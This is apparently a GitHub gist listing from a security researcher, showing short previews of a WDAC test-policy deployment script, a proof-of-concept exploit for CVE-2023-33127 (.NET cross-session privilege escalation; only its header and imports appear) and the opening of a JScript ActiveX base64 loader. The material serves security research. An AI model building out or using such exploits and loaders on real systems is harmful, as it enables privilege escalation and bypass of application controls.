@bohops
bohops / Deploy-EnforcedWDACScanPolicy.ps1
Last active May 17, 2024 01:05
Restrictive (with caveats) WDAC Policy for research purposes
Write-Host "
==============================================================================================================================
*Deploy an Enforced 'Scan' Windows Defender Application Control (WDAC)/Device Guard Policy with Code Integrity (UMCI)
*Focus: Permit signed applications at the PCACertificate level (e.g. Microsoft signed).
*For Testing on Windows 10/11 Business/Enterprise - Downloads and merges the WDAC Bypass Rules with a scan policy
*System reboots when PowerShell script finishes
*Run as a privileged user in high integrity
*To remove enforcement, comment out enforce line
@bohops
bohops / CVE-2023-33127.cs
Last active June 12, 2024 09:41
CVE-2023-33127: .NET Cross-Session Privilege Escalation Exploit
// CVE-2023-33127 POC Exploit: .NET Cross-Session Privilege Escalation
// Ref: https://bohops.com/2023/11/27/abusing-net-core-clr-diagnostic-features-cve-2023-33127/
using System;
using System.Runtime.InteropServices;
using System.Threading;
using System.Diagnostics;
using System.Security.Principal;
using System.IO.Pipes;
using System.IO;
[JS File]
function setversion() {
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);